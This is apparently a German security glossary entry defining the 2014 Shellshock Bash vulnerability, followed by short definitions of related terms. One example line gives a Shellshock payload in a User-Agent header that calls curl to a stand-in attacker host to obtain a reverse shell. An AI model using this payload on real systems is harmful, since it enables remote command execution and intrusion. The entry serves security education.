Schwachstellen
Shellshock (CVE-2014-6271)
Auch bekannt als: Bashdoor, CVE-2014-6271
Definition
GNU-Bash-Schwachstelle von 2014, mit der Angreifer beliebige Befehle ausführen konnten, indem speziell gestaltete Umgebungsvariablen über andere Programme an Bash übergeben wurden.
Beispiele
- User-Agent () { :; }; /bin/curl attacker.com an einen Bash-CGI-Endpunkt senden, um eine Reverse Shell zu erhalten.
- Ausnutzen eines DHCP-Clients, der Option-Strings in die Umgebung eines Bash-Hook-Skripts exportiert.
Verwandte Begriffe
Command Injection
Command Injection — definition coming soon.
CVE (Common Vulnerabilities and Exposures)
Öffentlicher Katalog, der jeder offengelegten Software- oder Hardware-Schwachstelle einen eindeutigen Bezeichner zuweist, um sie branchenweit eindeutig zu referenzieren.
Aktiv ausgenutzte Schwachstelle (KEV)
Eine CVE, die die US-CISA als aktiv ausgenutzt bestätigt und in ihren öffentlichen KEV-Katalog aufnimmt, wodurch Behandlungsfristen für US-Bundesbehörden ausgelöst werden.
Remote Access Trojaner (RAT)
Schadsoftware, die einem Angreifer verdeckte, interaktive Kontrolle über ein infiziertes Gerät verschafft – wie ein verstecktes Fernwartungstool.
Exploit
Code, Daten oder Technik, die eine Schwachstelle ausnutzt, um unbeabsichtigtes Verhalten wie Codeausführung, Privilegieneskalation oder Informationsabfluss zu erzwingen.
Privilegieneskalation
Eine Klasse von Schwachstellen, die einem Angreifer höhere Rechte verschafft als ursprünglich vergeben — etwa vom normalen Benutzer zum Administrator.